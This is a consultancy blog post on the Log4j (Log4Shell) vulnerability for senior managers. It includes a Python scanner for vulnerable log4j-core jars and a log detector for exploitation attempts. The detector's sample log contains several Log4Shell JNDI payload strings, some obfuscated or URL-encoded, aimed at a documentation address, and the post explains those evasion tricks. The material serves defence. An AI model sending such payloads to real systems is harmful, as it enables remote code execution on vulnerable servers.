What’s That Coming Over The Hill, Is It a Monster?
A guide for senior management in response to the Log4j critical vulnerability
Just like in the lyrics of the song Monster by the band The Automatic, the answer is a resounding yes, in the shape of the Log4j critical vulnerabilities (commonly known as Log4Shell). Most IT and infosec teams will still be battling their way through identification, mitigation and long-term patching activities. These could last for many weeks and come as a real distraction when businesses would rather focus on growth priorities for 2022. Now, there will be those of you reading this thinking: what’s the fuss? I have not seen any major data breaches reported in the media so far. Is this just another over-hyped cyber scare? I will leave you to reach your own conclusions. Check Point has reported observing over 100 attacks every minute against at-risk assets susceptible to this critical vulnerability (CVE-2021-44228), so I strongly urge you to take appropriate precautions to protect your business.
So, in the words often attributed to Winston Churchill, ‘Never let a good crisis go to waste’, what must senior managers understand to guide their decision-making in response to this evolving and significant threat?
Firstly, software vendors and internal development teams are incentivised to deliver working code quickly, and not always secure code. The root cause of this incident was a logging library that performed JNDI lookups on attacker-controlled input, squarely the injection class of flaw that the OWASP Top 10 warns about. Had the Apache Log4j project applied the secure development practices the OWASP Top 10 exists to promote, above all never trusting logged input enough to act on it, this incident would very likely have been avoided. The first takeaway therefore is to check that your vendors and internal development teams follow OWASP secure development best practices and that appropriate security testing processes (code review, dependency scanning and application security testing) are in place.
Secondly, there is the dreaded subject of security patching, a significant and little-understood challenge for IT teams. Security patching is paramount in this digital age, but it is not always foremost in the minds of busy admins and developers. It should be performed routinely to keep business systems and the data they process secure and running smoothly. To achieve this, patching should be planned for, appropriately resourced and automated where possible as part of the application life cycle management process. Frameworks and regulations such as Cyber Essentials, GDPR and PCI DSS all require supported and patched hardware and software. The US National Vulnerability Database recorded 18,376 vulnerabilities in 2021, the highest ever, and Redscan Labs analysis found that 90% of these CVEs required little technical skill for attackers to exploit.
The second takeaway, then, is to implement a vulnerability management program for your business. That means defining patching SLAs and clear roles and responsibilities, and implementing a vulnerability scanning platform that provides both the detail needed by technical specialists and a vulnerability priority rating with good reporting, so that management can weigh risk against the cost of patching. Bear in mind that Log4j is a library embedded inside many vendors’ products rather than a product in its own right, so identifying where it lives depends as much on vendor advisories and an accurate software inventory as on the scanner. Few companies can afford to have every vulnerability fully patched, so effective risk management is essential.
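As an added, illustrative example (not code from the original article or from Mondas Consulting), the following Python script shows the identification step a vulnerability management program has to get right for Log4j: finding every copy of log4j-core on a host, including copies buried inside WAR, EAR and fat jars where a file-name search does not look, and classifying each against CVE-2021-44228. It relies on two things real log4j-core jars carry, the Maven pom.properties file and the JndiLookup class (whose removal was the documented interim mitigation). The version rule it applies (releases before 2.15.0 are vulnerable, except the backported 2.3.1 and 2.12.2 fixes) and the stub jars it builds for demonstration are assumptions of the example.

```python
"""Find Log4j 2 core jars on disk and classify them against CVE-2021-44228.

Added example for this article; it is not Mondas Consulting's tooling or
the Apache project's. It reads two things that real log4j-core jars carry:
the Maven pom.properties file (for the version) and the JndiLookup class
(whose removal was the documented interim mitigation). Archives nested in
WAR/EAR/fat jars are descended into, because that is where most copies live.
"""
import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Qualifiers are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def assess(version, has_jndi_lookup):
    """Classify one log4j-core jar.

    Rule applied (an assumption of this example, following the Apache advisory):
    2.x releases before 2.15.0 are vulnerable to CVE-2021-44228, except the
    backported fixes 2.3.1+ (Java 6) and 2.12.2+ (Java 7). A vulnerable
    version missing JndiLookup.class had the class-removal mitigation applied
    and still needs a real upgrade.
    """
    if version is None:
        return "UNKNOWN-VERSION"
    if version >= (2, 15, 0):
        return "PATCHED"   # later CVEs (fixed in 2.17.1) are outside this check
    if (2, 12, 2) <= version < (2, 13, 0) or (2, 3, 1) <= version < (2, 4, 0):
        return "PATCHED-BACKPORT"
    return "VULNERABLE" if has_jndi_lookup else "MITIGATED-CLASS-REMOVED"


def scan_archive(data, name, findings):
    """Inspect one archive held in memory and recurse into archives inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        raw = m.group(1).strip() if m else "?"
        findings.append((name, raw, assess(parse_version(raw), JNDI_LOOKUP in names)))
    for inner in sorted(names):
        if inner.lower().endswith(ARCHIVE_SUFFIXES):
            scan_archive(zf.read(inner), f"{name}!{inner}", findings)


def scan_tree(root):
    """Walk root and return [(path relative to root, version text, status), ...]."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), os.path.relpath(path, root), findings)
    return findings


def build_sample_tree():
    """Constructed fixture: stub jars carrying only the metadata paths above."""
    root = tempfile.mkdtemp(prefix="log4jscan-")

    def stub_jar(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:   # log4j hidden inside a web application
        zf.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", stub_jar("2.13.3"))
    samples = {
        "log4j-core-2.14.1.jar": stub_jar("2.14.1"),
        "log4j-core-2.14.1-mitigated.jar": stub_jar("2.14.1", with_jndi=False),
        "log4j-core-2.12.2.jar": stub_jar("2.12.2"),
        "log4j-core-2.17.1.jar": stub_jar("2.17.1"),
        "app.war": war.getvalue(),
    }
    for fname, blob in samples.items():
        with open(os.path.join(root, fname), "wb") as fh:
            fh.write(blob)
    return root


if __name__ == "__main__":
    for name, version, status in scan_tree(build_sample_tree()):
        print(f"{status:24} {version:8} {name}")
```

Point scan_tree at a real application directory to get one line per log4j-core copy, nested or not. The nested-archive walk is the part that matters in practice: a scanner that only matches file names will report a host clean while a vulnerable copy sits inside a WAR. Note that a PATCHED result here only covers CVE-2021-44228; the later Log4j CVEs need the version raised to 2.17.1 or above.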
Thirdly, how confident are you in your company’s threat detection and incident response capabilities? 2021 saw a record number of major zero-day threats, which are often exploited before, or soon after, being publicly disclosed. In such situations you have to survive for a period before patches are available, relying on your defence-in-depth controls and your ability to detect and contain attacks until a long-term fix arrives. With Log4j that has meant watching for exploitation attempts (the ${jndi:...} lookup strings arriving in web requests, headers and any other input that gets logged) and for the outbound LDAP, RMI or DNS connections from servers that a successful attempt triggers. The final takeaway is to ask those responsible for cyber security in your company what detection rules are in place for cyber threats, whether they have been recently tested, whether a major incident response plan exists, and when the last tabletop exercise was performed.
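To make ‘what detection rules are in place’ concrete, here is an added example (not code from the original article or from Mondas Consulting) in Python that flags Log4Shell exploitation attempts in web-server log lines. It exists because a naive search for ${jndi: misses most real traffic: attackers hide the string behind Log4j’s own lookup syntax (${lower:j}, ${::-j}, ${env:X:-j}) and behind URL-encoding, so the detector unwinds those layers the way Log4j itself would before matching the canonical form. The log lines are constructed for the example, using RFC 5737 documentation addresses.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in logged input.

Added example for this article, not Mondas Consulting's detection content.
A plain search for "${jndi:" misses most real attempts, because attackers
hide the string behind Log4j's own lookup syntax and URL-encoding. This
detector undoes those layers first, then matches the canonical form.
"""
import re
import urllib.parse

# An innermost lookup: ${...} whose body contains no further ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Canonical attempt after normalisation; the group captures the scheme.
JNDI = re.compile(r"\$\{jndi:([a-z]+)", re.I)


def url_decode(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are exposed too."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def simplify(text, max_rounds=32):
    """Resolve nested lookups from the inside out.

    Mirrors what Log4j's string substitution does with attacker-supplied text:
    ${name:-default} yields the default, ${lower:x}/${upper:x} yield x,
    ${date:'x'} yields the quoted literal. Real resolvers such as jndi:
    and env: are left in place so the final match sees them.
    """

    def resolve(m):
        body = m.group(1)
        if ":-" in body:                       # ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}
            return body.split(":-", 1)[1]
        lowered = body.lower()
        if lowered.startswith(("lower:", "upper:")):
            return body.split(":", 1)[1]
        if lowered.startswith("date:"):
            return body.split(":", 1)[1].strip("'")
        return m.group(0)                      # untouched: ${jndi:...}, ${env:PATH}

    for _ in range(max_rounds):
        new = INNER.sub(resolve, text)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) of an attempt, or None."""
    m = JNDI.search(simplify(url_decode(line)))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Return [(1-based line number, scheme)] for lines carrying an attempt."""
    hits = []
    for i, line in enumerate(lines, 1):
        scheme = detect(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed web-server access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '198.51.100.1 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.3 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.5/x}"',
    '198.51.100.4 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://203.0.113.5/c}"',
    '198.51.100.5 - - [13/Dec/2021:10:01:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.5%2Fz%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.6 - - [13/Dec/2021:10:01:19 +0000] "GET /?q=%2524%257B%2524%257Benv%253ANOPE%253A-j%257Dndi%253Aldap%253A%252F%252F203.0.113.5%252Fd%257D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.7 - - [13/Dec/2021:10:01:21 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme in scan_lines(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup attempt via {scheme}")
```

Run as-is it reports lines 2 to 6 and stays quiet on the benign lines, including line 7, which merely contains the word jndi in a path. The same normalisation applies to any logged field (User-Agent, X-Forwarded-For, form fields, usernames), which is where real attempts were seen; a rule that only inspects the URL misses them. A hit on an attempt is a reason to check that host’s outbound connections, since the attempt only succeeded if the server then reached out to the attacker’s LDAP, RMI or DNS endpoint.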
Mondas Consulting provides specialist support and services in all of these areas, so please get in touch if you require further assistance.